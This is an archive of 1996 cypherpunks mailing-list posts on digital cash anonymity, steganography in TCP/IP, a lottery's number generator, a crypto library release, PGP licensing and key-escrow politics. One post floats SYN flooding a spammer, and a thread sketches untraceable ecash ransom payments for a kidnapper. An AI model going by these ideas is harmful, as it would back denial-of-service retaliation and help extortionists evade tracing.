> could dump it on a disk, and close your internet account (unless you really 
> really trust your privacy technology).  And I also think that you would have 
> the option to cash this into real funds at either the Mark Twain bank, or 
> likely somewhere in the Caymen Islands (maybe through those online gambling 
> houses).
> 

The Digicash product only has one-way anonymity. Their own pages are
a good place to start:

http://www.digicash.nl/ecash/about.html

--CG





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nelson Minar <nelson@media.mit.edu>
Date: Tue, 15 Oct 1996 11:47:45 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Stego via TCP/IP (was Re: crypto wish list)
In-Reply-To: <199610142041.VAA00167@server.test.net>
Message-ID: <cpag23gjc4v.fsf@hattrick.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


What, a discussion of cryptography on the cypherpunks list?

aba@dcs.ex.ac.uk (Adam Back) writes:
>>Where is highly sophisticated stego?
>What are our options?
>- Stego in english text.
>- Stego in audio and graphic file formats
>- Stego in Internet Phone protocols.
>- Stego in Internet video conference formats

What about stego in IP itself? It's been awhile since I've looked, but
aren't there some bits one could subvert in the TCP/IP headers themselves?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: inssdl@dstn21.dct.ac.uk (inssdl)
Date: Tue, 15 Oct 1996 06:51:59 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Camelot PRNG
Message-ID: <9610151352.AA05251@dstn21.dct.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


In the UK, the National Lottery is run by a company called Camelot (in 
case anyone didn't know)

A while back, they introduced a new option, in that if you checked a 
certain box on your ticket, 6 numbers would be 'chosen' for you, 
presumably 'randomly'

Does anyone have any info on how this system works?

i.e. The PRNG used? Whether the PRNG is in the shop terminal or at the 
central computer @ Camelot? et cetera.

(I am looking at the problems of PRSG for my Masters dissertation - hence 
the interest) 

Please reply either to the cypherpunks list or to my e-mail address if 
you think this doesn't have any crypto-relevance.

Thanks in advance...

**********************************************************************
David Lucas PGDip Software Engineering @@ BEng(Hons) Civil Engineering
Postgraduate Software Engineer, University of Abertay Dundee, SCOTLAND
@ E-mail: inssdl@dstn21.dct.ac.uk @ 2+2 = 5  for large values of two @
If you're not living on the edge, then you're taking up too much space
Organisations can't have opinions, only people can and these are mine.
Dave's Doorstep is back!!! - http://river.tay.ac.uk/~inssdl/index.html
**********************************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Tue, 15 Oct 1996 11:51:40 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Fuck Cyberpromo
Message-ID: <199610151851.LAA14280@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> It seems to me that every time I send a message to cypherpunks, I get a 10k
> message entitled "RESPONSE FROM CYBERPROMO" from "abusebot@savetrees.com
> (Mail AutoResponder)" .
>[...]
> I would expect that if everyone on this list who gets one of these things
> -- which I suspect is everyone who posts here lately -- turned right around
> and sent it on to this wallace@cyberpromo.com address, those, er,
> caprophageous cretins, (thanks, DCF; don't sue me for copyright violations
> ;-)) would get the hint in a hurry.
> 
> I'm starting with the one I have, and, of course, I'll also do it for the
> message I get from sending *this* posting.
> 
> Cheers,
> Bob Hettinga

Those of us who occasionally dip into that Slough of Despond
known as news.admin.net-abuse.misc are *very* familiar with
Mr. Wallace. Check out, for example, 
news:// 32617de2.18341458@news.onramp.net,
where he is ignoring a court order to stop spamming.

Bouncing mail back to him may be emotionally satisfying, but
I suspect he filters it. He also has a skin as thick as a rhino's.

Peter Trei
trei@process.com 

Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: scottb@aca.ca
Date: Tue, 15 Oct 1996 12:19:11 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: RE:  Re: extortion via digital cash
Message-ID: <96Oct15.151831edt.15382-3@gateway.aca.ca>
MIME-Version: 1.0
Content-Type: text/plain




 ----------
>From: azur
>Subject:  Re: extortion via digital cash
>Date: Tuesday, October 15, 1996 2:18PM
>
<SNIP>

>Although Digicash's ecash offers anonymity to the payor it does not to the
>payee.  The reasons have to do with the way coins are blinded.  So LE
>could, with the bank's cooperation, easily associate the two sides of a
>transaction.  This was intentional on Chaum's part, either for moral or
>practical political considerations.  Its probably only a relatively minor
>patch to allow one ecash purse (the kidnapper's) to generate the blind
>token values so that another (similarly patched) purse (the vicitim's) can
>submit them to the mint and return the minted coins to the kidnapper (e.g.,
>by posting on a popular Usenet group).  In this scenario the only
>reasonable way left to track the money is via linkage (the size and timing
>of deposits and withdrawls in the kidnapper's account).

I would tend to think that if you held on to the money long enough, you 
would
thwart them tracking it via linkage-especially once it becomes more 
commonplace
to do electronic transactions on the Net.  Actually, if you wait long 
enough, you
likely will  run the risk of there being a crackdown on nym servers, 
remailers, etc, and
maybe even specialy designed cancel-bots on usenet.

/sb 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Tue, 15 Oct 1996 15:28:26 -0700 (PDT)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: WOW!
In-Reply-To: <NyquVD1w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.961015151127.21552A-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Tue, 15 Oct 1996, Dr.Dimitri Vulis KOTM wrote:

> At any rate, if people are really willing to pay this sort of money
> to hear me speak, perhaps I should make a videotape of me giving a
> presentation about my Usenet cancelbot and send it to Sandy?

Dimitri is certainly welcome to bring his video with him, but 
just sending the tape defeat the whole purpose of a physical 
meeting.  When we have speakers, there are opportunities to 
expand or contract one's talk to conform to the particular 
audience's interests.  A live presentation allows the listeners 
to ask for clarifications and to provide useful feedback to the 
speaker.

I am again extending my most sincere invitation to Dimitri to
come to San Francisco to address a Cypherpunk physical meeting.
What I need now is a simple "yes" or "no".  After that, I will
bend over backwards (but not forwards) to accomodate Dimitri's 
particular concerns.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: amnesia@chardos.connix.com (Anonymous)
Date: Tue, 15 Oct 1996 16:09:49 -0700 (PDT)
To: cypherpunks@toad.com
Subject: RSA
Message-ID: <199610151935.PAA03334@chardos.connix.com>
MIME-Version: 1.0
Content-Type: text/plain


Timmy C. Mayflower was born when his mother was on the 
toilet.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L.Detweiler" <ldetweil@csn.net>
Date: Tue, 15 Oct 1996 15:12:38 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Dmitri
Message-ID: <199610152212.QAA08285@teal.csn.net>
MIME-Version: 1.0
Content-Type: text/plain



I just pledged $20 for Dmitri's trip and want to publicly
encourage him to attend. Dmitri, I can attest the cpunks and Sandy
are gracious hosts. (lately Dmitri has been sending me mail intermittently
about tcm)

because of the extremely wide 
interest and "buzz" factor of this activity, I suggest this invitation of
guests with donations be made a semi-regular feature of cpunk meetings, 
with discussions on the list about future guests.

btw, I have recently tweaked my www site slightly for anyone who
is interested.

oh, and btw, there was a fantastic article on crypto in last week's
newsweek by Steven Levy, I don't recall seeing mention of it here.
it mentioned "crypto anarchy" and the 4 horsemen of the infocalypse.
a very concise yet informative and current article.


|   /\  |\| /~ L~
L_ /~~\ | | \_ L_
http://www.csn.net/~ldetweil/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Verheul <everheul@NGI.NL>
Date: Tue, 15 Oct 1996 08:24:52 -0700 (PDT)
To: "'roy@scytale.com>
Subject: AW: binding cryptography
Message-ID: <01BBBAB8.1B2CF2E0@port13.ztm.pstn.rijnhaave.net>
MIME-Version: 1.0
Content-Type: text/plain


On dinsdag 15 oktober 1996 14:09, Roy M. 
Silvernail[SMTP:roy@sendai.scytale.com] wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>In list.cypherpunks, everheul@NGI.NL writes:
>
>> BTW, some people on the cypherpunks list seem to think that you can't =
>> fraude with a *voluntary* system. However, that is possible: when you do 
=
>> not comply with the *agreed* rules of conduct then the phrase "fraude" =
>> is appropriate.
>If the system is *voluntary* and I do not *agree* to participate, then I
>*cannot* be breaking any "rules".

That is correct. Sorry that the BTW-statement is so evident. Some people 
did not understand that if you *do* agree, then you *can* be breaking any 
rules...

>>> Can you imagine what would happen if governments would (help to) set up 
=
>> a system that has no safeguards at all, i.e.  that could give criminals 
=
>> all the anonimity and confidentiality they need? Governments can't =
>> probably prevent criminals and the like to use encryption to stay out of 
=
>> sight of law enforcement agencies, but they should not facilitate them =
>> either. In the next few years all kinds of "standard" commerical =
>> software will come on the market with all kinds of standard security in 
=
>> it. I don't want criminals to be happy with Custom of The Shelf products 
=
>> for security, let them work for their security.
>
>Which they will, and presumably already do.  Therefore, your proposal
>does not and cannot hamper criminals.  Therefore, your proposal only
>hampers law abiding citizen-units' access to uncompromised crypto.
I do not agree. For instance, the encryption possibilities of wordperfect, 
and MS-word are weak; my mail-system (ms-exchange) does not have any 
encryption at all. The security of these important Custom of The Shelf 
products can and will be enhanced..

>No institution can expect compliance from a sector of society that,
>by definition, does not agree to or follow the social contract.
>Therefore, any and all such attempts to do so must be for the purpose of
>controlling those citizen-units that do abide the social contract.  To
>claim otherwise is absurd.
The point is that public available systems should *aid* not them in their 
criminal activities, let them search for alternatives. Compare it with the 
legislation we have here on the sell of guns. You sort of say: hey, that 
does not help cause criminals will get it somewhere. I say, that is true, 
but it will make their lifes more difficult, or maybe I should say less 
easy.

>
>> The bottom line is that law-abiding citizens =
>> always have to give up some of their freedom to stop criminals (that is 
=
>> why you have to have registration plates on your car, a lock on your =
>> car, bicycle, house etc.). That is a fact of life; one I hate.
>
>Registration plates do not "stop criminals".  Locks do not "stop
>criminals" (although they might slow a criminal down).  Neither will
>compromised crypto "stop criminals".  But all the above impinge on my
>liberty.  Am I to give up yet another freedom?
Our system slows down criminals too, or maybe I'd better say does not speed 
them up.
Locking my house and my car, certainly limits my freedom too because it 
gives me
the risc of losing the key (happened a few times). Finding the middle of 
losing freedom by law-abiding citizens on the one hand and stopping 
criminals on the other hand is an important issue in any democracy. We 
believe our system gives a solution in which every democratic country on 
his own implement to their middle, without losing connectivity with 
countries that think otherwise.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Tue, 15 Oct 1996 14:08:21 -0700 (PDT)
To: cypherpunks@toad.com
Subject: using TCP sequence numbers for stego
Message-ID: <Pine.LNX.3.95.961015165112.590A-100000@gak.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Would using TCP sequence numbers to carry stegoed data be practical?  The data
would have to be removed at a lower level.  This would mean kernel patches and
extra system calls in UNIX.  I have no idea what this would require under
Windows or Mac.  This seems like the ideal place to stego data because
most OS's have started using random sequence numbers.  Any ideas?

Mark
- -- 
finger -l for PGP key
PGP encrypted mail prefered.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMmP7sSzIPc7jvyFpAQHlUQf+JwmltREsYq65f5YPOdubmr8hxAjfiOa+
zIX7VpP75qm+SgiZTxBaioN2pVzW0yCb36IqNKYuZuUww/ip8Bh/0aNnyzNguD+p
jXVOLpzbfBeD33Q+NLag6N2R2PogZQT2yx2vfSwQ9zeyoZ1CYTxiKZHDq06czzAt
gq3wszp0l9U1jr2xTnmprNYofYUrvWitpId41tTbyx336dmJ5lNKS1Nssu/+vCZC
B9Gib+s/ayQz6BGuEDCVqr36cZY75uHYfUuMnIHnONYAsFC4qR1vNdJ/OnCXJJR2
D6Ns9POsb9NGCh0pFzGjDavpQKwIU9b/Br30vge1tKsPA30GByPJMQ==
=NaaI
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christopher Durfy <chris@alphawave.com>
Date: Tue, 15 Oct 1996 14:05:02 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Majordomo w/ built-in security
Message-ID: <Pine.LNX.3.93.961015172038.21026C-100000@bigkahuna.alphawave.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi guys, I'm new to the list, and it looks like a good one ;)

I've got a question, and was hoping someone could point me in the right
direction. Here's the situation:

A large group of Doctors want to have an email list set up, but are
concerned about privacy issues. Client's confidential patient info is
likely to be talked about, and any interception of data would likely
caused them to get sued =P

Would the best way to get somehow incorporate PGP into the majordomo or
smartlist (if it's possible) and either assign keys to all the doctors
(or one key for ALL the doctors maybe, to cut on admin times....)

Anyone ever run up against a situation like this? Any pointers, horror
stories or solutions are very welcome! 

Thx.

-Christopher Durfy, chris@alphawave.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Scanlon <tfs@vampire.science.gmu.edu>
Date: Tue, 15 Oct 1996 15:05:28 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Fuck Cyberpromo
In-Reply-To: <199610151851.LAA14280@toad.com>
Message-ID: <9610152204.AA02090@vampire.science.gmu.edu>
MIME-Version: 1.0
Content-Type: text


Peter Tre wrote:
> Those of us who occasionally dip into that Slough of Despond
> known as news.admin.net-abuse.misc are *very* familiar with
> Mr. Wallace. Check out, for example, 
> news:// 32617de2.18341458@news.onramp.net,
> where he is ignoring a court order to stop spamming.
> 
> Bouncing mail back to him may be emotionally satisfying, but
> I suspect he filters it. He also has a skin as thick as a rhino's.

Not that I would do it, but SYN flooding could very well provide
an adequate solution to Mr. Wallace.

Tim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 15 Oct 1996 18:47:18 -0700 (PDT)
To: cypherpunks@toad.com
Subject: mail software for multiple addrs
Message-ID: <199610160147.SAA09538@netcom2.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


hi everyone. I'm asking this here because I know that cpunks
spend a lot of time in email. I'm looking for some GUI
software that can deal well with

1. multiple internet providers - i.e., if I have multiple
providers, I would like the software to be able to easily
deal with them all, without having to retype IP addresses
etc. into dialog boxes

2. multiple email accounts - i.e. the mail software is not
going to use merely one POP account, but should be able
to have different email addrs and passwords over POP

3. multiple mailing lists - I'd like a way to sort incoming
mail into separate folders/directories based on  header
fields, and a way to automate this. (i.e. not have to
go through the same procedure each time of typing the
fields etc.)

I am aware of Netscape's mail features, which don't really
handle much of the above.  also, I suspect many people
require some combination of the above, so there is probably
software out there to do it.. at least there is a demand.

also, I'm aware of procmail but would prefer something
that supports a GUI interface.

also, if you know of a better place to post this query, please
tell me.

thanks much;





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut001@cs.auckland.ac.nz
Date: Mon, 14 Oct 1996 23:09:59 -0700 (PDT)
To: cypherpunks@toad.com
Subject: cryptlib 2.00 free encryption library released
Message-ID: <84535983805268@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


Version 2.00 of cryptlib is now available from
ftp://garbo.uwasa.fi/pc/crypt/crypl200.zip and also from
ftp://ftp.franken.de/pub/crypt/misc/cryptl200.zip.
 
The library provides an easy-to-use interface which allows even inexperienced
crypto programmers to easily add strong encryption and authentication services
to their software.  The library contains DES, triple DES, IDEA, MDC/SHS, RC2,
RC4, RC5, SAFER, SAFER-SK, Blowfish, and Blowfish-SK conventional encryption,
MD2, MD4, MD5, RIPEMD-160 and SHA hash algorithms, and Diffie-Hellman, DSA, and
RSA public-key encryption, as well as a comprehensive high-level interface with
functions such as cryptCreateSignature() and cryptExportKey().  The library is
supplied as source code for Unix (shared or static libraries), DOS, Windows
(16- and 32-bit DLL's), and the Amiga.
 
The library provides a standardised interface to a number of popular encryption
algorithms, as well as providing a high-level interface which hides most of the
implementation details and provides an operating-system-independant encoding
method which makes it easy to transfer encrypted data from one system to
another.  Although use of the the high-level interface is recommended,
experienced programmers can directly access the lower-level encryption routines
for implementing custom encryption protocols or methods not provided by the
library.
 
The library API serves as an interface to a range of plug-in encryption modules
which allow encryption algorithms to be added in a fairly transparent manner.
The standardised API allows any of the algorithms and modes supported by the
library to be used with a minimum of coding effort.  As such the main function
of the library is to provide a standard, portable, easy-to-use interface
between the underlying encryption routines and the user software.  In addition
the easy-to-use high-level routines allow for the exchange of encrypted session
keys and the creation and checking of digital signatures with a minimum of
programming overhead.
 
The library has been written to be as idiot-proof as possible.  On
initialization it performs extensive self-testing against test data from
encryption standards documents, and the API's check each parameter and function
call for errors before any actions are performed, with error reporting down to
the level of individual parameters.
 
The library implements a security perimeter around the encryption functions,
with encryption contexts consisting of an arbitrary handle referring to
(hidden) data held within the library.  No outside access to state variables or
keying information is possible, provided the underlying OS provides some form
of memory protection.  If the OS supports it, all sensitive information used by
the library will be page-locked to ensure it is never swapped to disk.
 
There is one small bug I found about an hour after it was released (sigh), you
can't use CRYPT_USE_DEFAULT as a parameter to cryptCreateContext() due to
missing parentheses in crypt.c.
 
Incidentally, if someone in Europe with a high-bandwidth link to the rest of
the world could provide a permanent site for cryptlib betas that'd be useful,
since the current beta distribution system is rather ad hoc.

Peter.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark O. Aldrich" <maldrich@grci.com>
Date: Tue, 15 Oct 1996 16:18:30 -0700 (PDT)
To: SPYRUS <gweissman@spyrus.com>
Subject: Re: Crypto: Systems & Application Developers Wanted
In-Reply-To: <325F68C7.6F29@spyrus.com>
Message-ID: <Pine.SCO.3.93.961015185241.9275C-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 12 Oct 1996, SPYRUS wrote:

> SPYRUS, the leading provider of cryptographic tokens (PC cards & 
>      Smart Cards), with associated systems and applications software, is 
>      looking for engineers with the following qualifications to work 
> with
>      our Secure Applications Group in San Jose, CA:
>      

Uh, excuse me, but doesn't SPYRUS in fact market a Fortezza card?  The
very same card being used by the Evil Empire to spread diseased and impure
so-called "cryptography" (with GAK permanently embedded into it) to the
uninformed minions?  And, in participating in this rape of society, are
you nor profiting from the very thing that many of us find so repulsive?
It seems that you've fully cooperated with the GAK ideology (see
http://www.spyrus.com/data/7.shtml) even though it is understood to be
contraindicated in a free and open society. 

Before you go spamming mailing lists again trolling for people with no
scruples who'll whore themselves out to help you fuck over the American
people, you might get enough of a clue to know where you're posting.

For whomever is undertaking the SPYRUS infiltration task, you know what to
do....

------------------------------------------------------------------------- 
|some people get by                       |        Mark Aldrich         |
|with a little understanding              |   GRCI INFOSEC Engineering  |
|some people get by                       |     maldrich@grci.com       |
|with a whole lot more                    | MAldrich@dockmaster.ncsc.mil|
|               -- Sisters of Mercy       |                             |
|_______________________________________________________________________|
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     |
|         and my employer gets no credit for them whatsoever.           |
-------------------------------------------------------------------------







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark O. Aldrich" <maldrich@grci.com>
Date: Tue, 15 Oct 1996 16:41:04 -0700 (PDT)
To: pclow <pclow@pc.jaring.my>
Subject: Re: Royalties
In-Reply-To: <32639BFA.503E@pc.jaring.my>
Message-ID: <Pine.SCO.3.93.961015192159.9275D-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 15 Oct 1996, pclow wrote:

> I understand from a previous post that if I were to 
> commercialised PGP in a package, I have to pay some
> royalties(?) to the owners(?) of IDEA. My apologies to 
> the list for repeating the question which is, who
> do I pay to and how much.

You cannot commercialize PGP whether you pay Ascom-Tech any royalties or
not.  Phil Zimmermann grated an exclusive license to ViaCrypt, Inc. a
number of years ago to be the sole commercial version of PGP.  In the mean
time, PGP Inc. was formed and has acquired ViaCrypt.  Thus, PGP Inc. now
holds the exclusive license on commercial PGP products.  Just by chance,
Phil Zimmermann is the CEO of PGP Inc. 

If you bundle ViaCrypt/PGP's commercial offering into a "suite" of some
sort, you needn't worry about the license fee as ViaCrypt's stuff is not
covered by Ascom-Tech's license arrangement.  You would, however, have to
get ViaCrypt's permission *and*, I think, if you were to ever get an
export capability to Europe, you'd then be liable for the license fee.

If you're just interested in packaging IDEA into something, you can
contact the owners at:

Ascom Tech LTD
Morgenstrasse 129
CH-3018 Bern
Switzerland

Phone: +41 31 999 42 63

Fax: +41 31 999 36 07

------------------------------------------------------------------------- 
|some people get by                       |        Mark Aldrich         |
|with a little understanding              |   GRCI INFOSEC Engineering  |
|some people get by                       |     maldrich@grci.com       |
|with a whole lot more                    | MAldrich@dockmaster.ncsc.mil|
|               -- Sisters of Mercy       |                             |
|_______________________________________________________________________|
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     |
|         and my employer gets no credit for them whatsoever.           |
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark O. Aldrich" <maldrich@grci.com>
Date: Tue, 15 Oct 1996 16:44:55 -0700 (PDT)
To: Matthew Ghio <ghio@myriad.alias.net>
Subject: Re: Sameer should sue the SPA
In-Reply-To: <199610150743.DAA06174@myriad>
Message-ID: <Pine.SCO.3.93.961015193307.9275E-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 15 Oct 1996, Matthew Ghio wrote:

> Also, SPA is going after C2 because one of their customers allegedly
> had a link to a pirate site - but they have (apparently) not gone after
> the pirate site itself!  Could someone explain to me how there can be a
> finding of contributory copyright infringement, when there is no direct
> copyright infringement?
<snip> 

The SPA isn't going to go after pirate sites because they're operated by
kids in basements who've got no money.  C2 has money.  The SPA likes
money.  SPA sues C2.  (I'm sure there's some formal sentential logic that
someone can post that will state this in even more succinct terms.)

The SPA doesn't care about what's right or what's wrong, or what's legal
or what isn't.  It wants money and it must not be getting enough from its
member organizations, so it's time for a few law suits.

------------------------------------------------------------------------- 
|some people get by                       |        Mark Aldrich         |
|with a little understanding              |   GRCI INFOSEC Engineering  |
|some people get by                       |     maldrich@grci.com       |
|with a whole lot more                    | MAldrich@dockmaster.ncsc.mil|
|               -- Sisters of Mercy       |                             |
|_______________________________________________________________________|
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     |
|         and my employer gets no credit for them whatsoever.           |
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila@primenet.com
Date: Tue, 15 Oct 1996 14:05:49 -0700 (PDT)
To: Duncan Frissell <cypherpunks@toad.com>
Subject: Re: "Right to Privacy" and Crypto
In-Reply-To: <3.0b19.32.19961015115525.0067560c@panix.com>
Message-ID: <199610152205.QAA03946@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


In <3.0b19.32.19961015115525.0067560c@panix.com>, on 10/15/96 
   at 11:57 AM, Duncan Frissell <frissell@panix.com> said:

-.>I'm of course just a layman, not a law professor or scholar. But I feel it
-.>best that we not invoke a "right to privacy" to protect our crypto
-.>abilities, when such a "right" apparently does not exist.
-.>However, certain things which _look_ like a "right to privacy" do
-.>exist:
-.
-.I agree with your analysis.  It certainly matches what I was taught in
-.law school.  The rhetorical point I was making however is that a
-.*practical* not constitutional right to privacy exists as long as your
-.questioner eschews torture.  

        I disagree. the law school concept which I remember (given that 
    it was thirty-five years ago) was that privacy, although stated in
    many manifestos as a right, even an inalienable right, is solely the
    amount of privacy and freedom of invasion as granted in the Bill of
    Rights, and that in turn is subject to interpretation by the courts
    as it applies to a series of cases --i.e. the principal is stated
    in the Bill of Rights, but the case law continues to evolve and 
    shape the _limitations_ of government intrusion into your privacy 
    (actually, the decisions have generally reduced your privacy).

        BTW, this was McCracken's course in constitutional law at 
    Harvard.

        As we are aware: 

            the fifth has been destroyed by being held in contempt.

            the fourth has been gutted with all the no-knock cases.
        
            the second is abridged by registration, prohibitions, 
            licensing, disenfranchisement, etc.  the only thing  they 
            have not done is quarter troops in our houses...

            the first sort of stands, but consider that the right
            to privacy and the freedom of speech should also include
            the right NOT to speak --that has been gutted by the
            rulings on the fifth.

            no point discussing the rest of them --they're mostly
            ignored or cases are channeled into 1, 2, 4 and 5.

        of course, the one I object to is 14 which basically steals our 
    unlimited rights to our state citizenships.  after six years doing
    the real dirty work of deep-black ops in the 60s --I never again 
    wish to consider myself a "national U.S. citizen."  Thank you, my 
    Utah citizenship will do just fine!  and, no, I do not vote in 
    Federal elections.

        Eschewing torture, for instance, is a limitation of the 
    prosecutorial "effort" which can be applied in interrogation. For
    instance, the right to representation was not established with
    the approval of the Bill of Rights --it was a much later Supreme
    Court which said counsel _must_ be provided, which further expanded
    to "...the accused has a right to _effective_ counsel" (which, of
    course, is a joke considering the case load of the public 
    defenders who plea bargain or let it go to conviction).

-.I think it is useful to point out -- in response to government types
-.who assert that "there's no absolute right to privacy" --that they 
-.have actually set aside a zone of privacy by their rejection of 
-.torture as an interrogation technique.
-.
        Even though the Miranda act requires a "prisoner" to be read his
    rights (rights? Captain Kirk?), it does not preclude an overwhelming
    force of SWAT team members which has just crashed through the 
    house unannounced (let's not start that thread again) from rounding 
    up a man's family, naked, or close to naked, and start putting
    handcuffs on women and children.  Any man's (worth his salt) normal
    reaction is: "What the fuck are you assholes doing to my wife? --she
    had nothin' to do with it!"

        Bingo! The victim, innocent or not, has just admitted he is 
    guilty of something.  presuming they read the victim his Miranda
    before they starting abusing and terrifying (not far from torture is
    it?), the "admission of guilt" is fully qualified evidence, despite 
    the fact it may or may not have any relation to the case at hand 
    --and it will be read to the jury by some straight faced liar, sworn
    to by one of the belligerents whose paycheck is justified by his
    kill ratio.
        
        BTW, if they had not read 'em Miranda, they'll stand up and 
    swear they did anyway.  and who do you think is believed?

        And that is just the beginning --yes, they may be required by 
    law to grant you a phone call --but when?  in the federal system, 
    even if they have a detention area available, they are not required
    to give you phone call until they have booked you in the
    state/county holding facility (or even an MCC) --you can even be
    taken before the magistrate to determine bail and to be charged and
    still not have a telephone call. And, they can delay the hearing,
    and therefore the call --the favourite trick is to slide it over 
    the weekend. You have just appeared before the magistrate without
    the representation you might have been able to contact  --and they
    are not required to provide a public defender at a charge hearing.

        that is not "torture?"  personally, I consider physical torture 
    a wasted effort in today's world; but nothing outlaws emotional 
    terror, and being held without communication, with various federales
    passing you back and forth and asking for your name, etc. and
    accusing you of whatever, and making comments about your family,
    your history, your race, your religion.  falsehoods, falsehoods, and
    more "why did you do that? --didn't you know you could go to jail
    for life?  --right know we only have you charged with six counts at 5
    years each, but there are others.  --why don't you come clean?  --we
    can let you plead on just one charge which will cost you the 5 years
    at most --21 months with good time..."

        that is just the beginning of psychological torture. If they are
    criticized, whatever, the prisoner ends up in the "hole"  --despite 
    the fact certain standards are required by law, some holes are
    literally that --pitch black with one drain in the center of the
    floor; buck naked, including women (they spill the beans faster);
    two meals a day of a couple slices of bread, a slice of junk baloney
    [sic] if you are lucky.  why the hole?  dangerous in the general
    population; whatever. denial of privileges: visits, telephones, even
    legal visitation until "hole time" is up.

        think I'm putting you on?  want a list of a few jails which have
    facilities worse than what I described?

        no they cannot physically torture, but they can put your 
    intelligent, educated, civilized little white ass in with some some
    real sweet boyfriends, or sadists, or racists who are just waiting
    for revenge, or just plain killers "--oops, made a classification
    error;" and the tag on your toe says: "john doe #1276549860"

        and nothing prevents them from talking about poor Harry who did 
    not cooperate...

-.What this does is to remind listeners that coerced speech has an
-.unsavory history and it turns the argument from one between absolute
-.positions into one in which we are just arguing which sanctions should
-.be applied when.
-.
        I still do not agree.  in other words: ...'which' sanctions can 
    be legally applied when somebody is looking.

-.DCF

-."Note that many governments have officially given up rape and torture as
-.sanctions.  (These were once universal.)  All we have to do is get them
-.to give up murder, imprisonment, and robbery as sanctions and we'll have
-.civilized them completely."
-.
        although I will certainly agree with your tongue-in-cheek 
    comment...

        wish to check the cases of rape while in custody? --don't forget 
    to include sodomy by bubba, foreign objects for women, etc.  did 
    law enforcement do this?  indirectly, yes, by failing to protect the
    accused.

        reinstate physical torture by the state --at least you'll live
    through it!  they need you in court to parade as an example before
    they hustle you off for reeducation.

            attila

    P.S.    you have just heard only ONE of the reasons I refused to 
            ever consider practicing law in the United States; land of 
            body trading: lawyers with lawyers, lawyers with prosecu-
            tors, judges with an agenda, etc.  BOTH civil and criminal.

            I'm sure Brian Davis, as an ex-federale will disagree with 
            me --but he was never involved with the gestapo who live 
            and die by their kill ratio.  and the prisoner soon learns to
            keep his mouth shut.


--
  "I don't make jokes. 
    I just watch the government and report the facts."
        --Will Rogers





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Tue, 15 Oct 1996 18:56:24 -0700 (PDT)
To: everheul@NGI.NL (Eric Verheul)
Subject: Re: binding cryptography
In-Reply-To: <01BBBA25.B6CD8860@port13.ztm.pstn.rijnhaave.net>
Message-ID: <199610160110.UAA02179@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text


> Ulf Moeller[SMTP:um@c2.net] wrote:
> >Can you imagine that anyone would ever create a program that tries to
> >look like a conforming implementation, but generates invalid "binding"
> >data -- when it is so much easier to simply use PGP, and (if
> >necessary) disguise that fact using the government-approved encryption
> >software?  I don't, so in my opinion the verification process is
> >abolutely useless.
> Can you imagine what would happen if governments would (help to) set up =
